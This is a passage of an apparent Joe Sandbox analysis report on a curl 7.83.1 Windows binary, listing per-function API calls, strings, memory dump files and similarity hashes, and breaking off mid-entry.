accept.WS2_32(?,?,00000080), ref: 000FA175
ioctlsocket.WS2_32(?,8004667E,?), ref: 000FA1D8

Strings

Error accept()ing server connect, xrefs: 000FA192
Connection accepted from server, xrefs: 000FA1A7

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: acceptgetsocknameioctlsocket
String ID: Connection accepted from server$Error accept()ing server connect
API String ID: 36920154-1795061160
Opcode ID: a7dbd59b720075875407eb50890f62fde553191b5e8f84b40d81eabd22f8f900
Instruction ID: c57f879010c5f91bbe2dfac295ea655029b58618b4096e274b713ae36ebdc9de
Opcode Fuzzy Hash: a7dbd59b720075875407eb50890f62fde553191b5e8f84b40d81eabd22f8f900
Instruction Fuzzy Hash: 3831C471A00218EFDB649F34DC45BE9B7B9BF45310F1081AAE80DA7282DF745D889BA1

Function 000F94C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F9557
___from_strstr_to_strchr.LIBCMT ref: 000F9584
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F95A3

Strings

+, xrefs: 000F94EE
Got unexpected pop3-server response, xrefs: 000F94F4

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchrcallocfree
String ID: +$Got unexpected pop3-server response
API String ID: 1802162112-3277052657
Opcode ID: 41998734cd11401c1fdab479fedeb16f2adaf1996f27bcd41c5f93ffaeb18631
Instruction ID: 6dd7bc681ffe3c12d970af247e708725bc81a9901d2ae4fc27663601067d812e
Opcode Fuzzy Hash: 41998734cd11401c1fdab479fedeb16f2adaf1996f27bcd41c5f93ffaeb18631
Instruction Fuzzy Hash: 4E317B71A0060AAFEB2ACF20E845BB9FBE5FF40760F20412AE641A3581DB706E409794

Function 000EE822 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74networkCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,000EE982,00000000,?,?,?,000EEB73), ref: 000EE849
htons.WS2_32(?), ref: 000EE85B
inet_pton.WS2_32(00000017,::1,?), ref: 000EE877

Strings

localhost, xrefs: 000EE833, 000EE8C0
::1, xrefs: 000EE871

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: callochtonsinet_pton
String ID: ::1$localhost
API String ID: 4237634067-466958357
Opcode ID: b416fbfd365cf6dcc3bf729aac4182bff93ef7ef9fca49d153b1b9a9ba270dba
Instruction ID: 48dafa9f107e0f1330e311986ac4262cb89a8c54ff61566f49c2508d680dc90e
Opcode Fuzzy Hash: b416fbfd365cf6dcc3bf729aac4182bff93ef7ef9fca49d153b1b9a9ba270dba
Instruction Fuzzy Hash: 8C21CF32A10258DFDB04CF94D885BDB77F9FF48325F10406AE808AF181DBB0A945CB95

Function 000E9EC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000E9EDF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E9F59

Strings

%s%s%s:%d, xrefs: 000E9F08
Host, xrefs: 000E9F27
Host: %s, xrefs: 000E9F38

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchrfree
String ID: %s%s%s:%d$Host$Host: %s
API String ID: 653773606-4134764909
Opcode ID: f52bea3945a4ef136b7f910b4072ff9bdaec4c3833f0dc7a209dfd1adeab0d5a
Instruction ID: a410b5a2614b609e11c8b6e2afe3332d36933169002a3488de3ca8b1c7acb9cf
Opcode Fuzzy Hash: f52bea3945a4ef136b7f910b4072ff9bdaec4c3833f0dc7a209dfd1adeab0d5a
Instruction Fuzzy Hash: C0113D72308215BFD7189F55AC82AAB7BEADF81B70B11403AFD05EB381E7709C1186B0

Function 000EE8E1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 000EE8FF
inet_pton.WS2_32(00000002,127.0.0.1,?), ref: 000EE913
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,000EEB73,?,?,?), ref: 000EE937

Part of subcall function 000EE822: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,000EE982,00000000,?,?,?,000EEB73), ref: 000EE849
Part of subcall function 000EE822: htons.WS2_32(?), ref: 000EE85B
Part of subcall function 000EE822: inet_pton.WS2_32(00000017,::1,?), ref: 000EE877

Strings

localhost, xrefs: 000EE96E
127.0.0.1, xrefs: 000EE90D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: callochtonsinet_pton
String ID: 127.0.0.1$localhost
API String ID: 4237634067-2339935011
Opcode ID: b7815c138b5559b2184e1d252797137e728d5a55c616c10525ea7505eaef3a06
Instruction ID: fe4a4b17756f541969c267cd70d60b634256ab46e18abb36d9ecc66081ffba19
Opcode Fuzzy Hash: b7815c138b5559b2184e1d252797137e728d5a55c616c10525ea7505eaef3a06
Instruction Fuzzy Hash: 1711B175A00348DFDB05CF95E88569BBBF5FF89314F20406AE804AB242D7B19985CB90

Function 000C7F31 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7F43
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7F5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7F89
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7FA5

Strings

a, xrefs: 000C7F31

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdupfree
String ID: a
API String ID: 1865132094-3904355907
Opcode ID: bac169f07294905e7857cf752546b7f5a673c47d12f542de76fab41cd6dd7dd1
Instruction ID: d998a91a5f364429582f8a8927cbd0c7a27ca610a3bf413ce03ce08ca0dddb0f
Opcode Fuzzy Hash: bac169f07294905e7857cf752546b7f5a673c47d12f542de76fab41cd6dd7dd1
Instruction Fuzzy Hash: 0121A17460C7819FC7A4CF749494BAFB7E4AF8A315F188D2EE59ED7240DB3094868741

Function 000CDB81 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,0012F580,00000200,.curlrc,00000000,00000000,.curlrc,?,000CDC8B,?,00000000,00000000), ref: 000CDB9B
_strrchr.LIBCMT ref: 000CDBAC
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(0012F580,00117A20,00000000,00000200,%s%s,0011734C,.curlrc,?,000CDC8B,?,00000000,00000000), ref: 000CDC03

Strings

%s%s, xrefs: 000CDBE7
.curlrc, xrefs: 000CDB84, 000CDB87, 000CDBE1

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: FileModuleName_strrchrfopen
String ID: %s%s$.curlrc
API String ID: 494197015-3900187666
Opcode ID: a2a51390a2fa733fb23974f9e09ff9c63ba9433901ec41766bef55b4ec94ee41
Instruction ID: 08f7b09011899b5e806712a1768803443730db242875d015c135019f12126b3b
Opcode Fuzzy Hash: a2a51390a2fa733fb23974f9e09ff9c63ba9433901ec41766bef55b4ec94ee41
Instruction Fuzzy Hash: 97112B35208205AEEB1C5F389D85FFF7BA9DF86390F14417EE44697282D6A29D458270

Function 000C8B82 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

puts.API-MS-WIN-CRT-STDIO-L1-1-0(Build-time engines:), ref: 000C8BAB
puts.API-MS-WIN-CRT-STDIO-L1-1-0( <none>), ref: 000C8BDB

Part of subcall function 000D20F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,000C8A7A,curl 7.83.1 (Windows) %s,00000000), ref: 000D2101

Strings

<none>, xrefs: 000C8BD6
%s, xrefs: 000C8BBB
Build-time engines:, xrefs: 000C8BA6

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: puts$__acrt_iob_func
String ID: %s$ <none>$Build-time engines:
API String ID: 1292152210-2903797034
Opcode ID: cb5dc14c0a0e213f9811c4973893d76f11387e1d48f3c496812622eb20b71a1e
Instruction ID: ad31c41a88c39f9083f23036f392cd3bbe70addcc89f9a753111f59d70e6d258
Opcode Fuzzy Hash: cb5dc14c0a0e213f9811c4973893d76f11387e1d48f3c496812622eb20b71a1e
Instruction Fuzzy Hash: 75018671905208EBCB18EB94D912EEE7BB4BF14710F14406EF405A3282DF705F409799

Function 0010C34C Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 256COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 0010C3E2
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 0010C5B5

Strings

Excessive server response line length received, %zd bytes. Stripping, xrefs: 0010C525
response reading failed, xrefs: 0010C441
cached response data too big to handle, xrefs: 0010C5EC

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: freemalloc
String ID: Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed
API String ID: 3061335427-1004035239
Opcode ID: 4512bde999c9c1ad86528b792d7b7f6074668bd6444cd4a40829fcca7460f7c4
Instruction ID: 202ffed047cc3d05ae34def3694db552454ed1ddb7a0855dbaabd00cb1bb7bec
Opcode Fuzzy Hash: 4512bde999c9c1ad86528b792d7b7f6074668bd6444cd4a40829fcca7460f7c4
Instruction Fuzzy Hash: 3AA19175A0070AAFDB04CFA4C891AAEFBB5FF48310F10C52AE855A7281D7B1A951CFD0

Function 0010A885 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010ABCC
Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010ABFD
Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010AC1F
Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AC36
Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AC50

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00100F4D,?,?,000F0D79,?,?,00000000,?,?,?,000F0B5D), ref: 0010A8FF
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00100F4D,?,?,000F0D79,?,?,00000000,?,?,?,000F0B5D,?), ref: 0010A94A

Strings

SSPI: couldn't get auth info, xrefs: 0010A8BC
NTLM, xrefs: 0010A8A6, 0010A970

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$callocmalloc
String ID: NTLM$SSPI: couldn't get auth info
API String ID: 1437353635-1544621284
Opcode ID: 164a280e02e2df0c51cb75fbcd5a0c8b99292874d0dd2ee00ee68a13de30e964
Instruction ID: 842eb220cd505af580e3f4c759bce14fa96db9150b7fe138a403e979c0d1c1e4
Opcode Fuzzy Hash: 164a280e02e2df0c51cb75fbcd5a0c8b99292874d0dd2ee00ee68a13de30e964
Instruction Fuzzy Hash: 6751A17160460AEFDB18CF54DD849AE7BE9FF48350B50802AE845E36D0DBB0AD55CF92

Function 00101C53 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 000D09FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 000D0A07

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00101DC6

Strings

*, xrefs: 00101C60
Written %zu bytes, %I64u bytes are left for transfer, xrefs: 00101D7B
Failed to parse FETCH response., xrefs: 00101CA0
Found %I64d bytes to download, xrefs: 00101D02

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errnofree
String ID: *$Failed to parse FETCH response.$Found %I64d bytes to download$Written %zu bytes, %I64u bytes are left for transfer
API String ID: 1830139605-1126424615
Opcode ID: db36c51d1f19f20c6eb1359efffba10c702adea42927799119ef0b79cd67e19f
Instruction ID: 8ab2a9952d46f1fb2ef7d580b975246130c3afb0370a856d7b4fbcf9cb422f0e
Opcode Fuzzy Hash: db36c51d1f19f20c6eb1359efffba10c702adea42927799119ef0b79cd67e19f
Instruction Fuzzy Hash: BE51E8B1A40205BFEB14DB28C985FBAB7B5FF85324F54416EE448A72C2D774AD418790

Function 001067EE Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 149COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F0591,00000001,00000000,00000000,00000000,?,?,?), ref: 00106847

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 001068C8, 00106936, 0010693A
%c%c%c=, xrefs: 00106921
%c%c==, xrefs: 0010693B
%c%c%c%c, xrefs: 001068FB

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: malloc
String ID: %c%c%c%c$%c%c%c=$%c%c==$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
API String ID: 2803490479-989668499
Opcode ID: d491d5016166823f7651491bb9e6b710c48ace5eda441c5597cda59cd1ddd66c
Instruction ID: 776d4957a7766d43cf45194ce49ae13077ad8e123e4b12777ce81bfc0cb51640
Opcode Fuzzy Hash: d491d5016166823f7651491bb9e6b710c48ace5eda441c5597cda59cd1ddd66c
Instruction Fuzzy Hash: 29415B729046946FD7068B7888647BF7FF99F5A301F1840DAE8E1D73C2D6B58A12CB60

Function 000EE5C0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 000EE61D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 000EE657
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 000EE6F0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 000EE70A

Strings

Shuffling %i addresses, xrefs: 000EE5F8

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: freemalloc
String ID: Shuffling %i addresses
API String ID: 3061335427-3589116693
Opcode ID: 7c546b421a650366b4f871be9b9e186b7a984b1445d0bd8172a06e98cd0cdcf0
Instruction ID: 3e27bd594d2e9bc412221430776779fa14ee69b982aafc176d1e9e8dad51f549
Opcode Fuzzy Hash: 7c546b421a650366b4f871be9b9e186b7a984b1445d0bd8172a06e98cd0cdcf0
Instruction Fuzzy Hash: 8D417B75E0466ADFCB18CF69D8808AEBBF5FF48350B14406AE845E7350DB30AD12CB80

Function 000CFD52 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CFD9E
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000B08), ref: 000CFDBD
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000CFDCC

Strings

%s in URL position %zu:%s%*s^, xrefs: 000CFE4C
curl: (%d) %s, xrefs: 000CFE73

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: callocfreemalloc
String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
API String ID: 4086611775-2317922172
Opcode ID: f890eb599fc3061f780cf2c76151178dc6427f8804aaa2e94c8354d424d4f16c
Instruction ID: 4fec961736e818142588cb67565c96c957a8d3845684370338a2998c457faf42
Opcode Fuzzy Hash: f890eb599fc3061f780cf2c76151178dc6427f8804aaa2e94c8354d424d4f16c
Instruction Fuzzy Hash: E941E575A0030A9FDB28DF68C844FFEB7F6EB99314F1041ADE41A97242EB715E418B61

Function 000FDFE0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FE0B6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FE0D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FE0EE

Strings

Failure sending QUIT command: %s, xrefs: 000FE02D
QUIT, xrefs: 000FE00D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: Failure sending QUIT command: %s$QUIT
API String ID: 1294909896-1162443993
Opcode ID: dd285b2f8a44bd9c52fa7eb3bd82eb17d2db16dc8d13453ca4d53f36fffb1484
Instruction ID: 37608d919b49e8a3194504da0aae1d1d1e0b1d9cb207d17c9a1b515d141c5546
Opcode Fuzzy Hash: dd285b2f8a44bd9c52fa7eb3bd82eb17d2db16dc8d13453ca4d53f36fffb1484
Instruction Fuzzy Hash: 73312770704745ABDB249F34D884BAAB7D5FF44314F04817EE91987692DFF4A88087A5

Function 000C673A Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000C6762
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C6790
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(10000000), ref: 000C67A9
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C67D1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(01000000), ref: 000C67EA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdupfree$___from_strstr_to_strchr
String ID:
API String ID: 104559748-0
Opcode ID: ba3159e34f558b03fdbb57f61e187913229376ee4cd7a491249930d5a2116b64
Instruction ID: 816246fa74b01f15d68622ad86ba73645b60d97f49dceca3b5f1cdf2db0ecd55
Opcode Fuzzy Hash: ba3159e34f558b03fdbb57f61e187913229376ee4cd7a491249930d5a2116b64
Instruction Fuzzy Hash: 4831AC311087419FC379CF289454B6FBBE1BF8A314F284E5DE48A87591DB31E846CB41

Function 00101588 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001015B1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001015CF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00101629

Strings

SELECT %s, xrefs: 0010160A
Cannot SELECT without a mailbox., xrefs: 001015E3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: Cannot SELECT without a mailbox.$SELECT %s
API String ID: 1294909896-2454231232
Opcode ID: 30bb45e29dd2ef0a2112504b7438dbcb12be3d7ece8a5e6c2440682e380487e0
Instruction ID: d1775a39e65589e00bf4eb5f52fcde041659ded7507c1e427624a986c914e829
Opcode Fuzzy Hash: 30bb45e29dd2ef0a2112504b7438dbcb12be3d7ece8a5e6c2440682e380487e0
Instruction Fuzzy Hash: 1D112632700111FFC7185B14EC45BA9B7A5FF84320F10806BE945AB291DBF4AC118BE8

Function 000C8EEC Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 000D21C0: FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,000C8EF6), ref: 000D2208
Part of subcall function 000D21C0: WSACleanup.WS2_32 ref: 000D2227

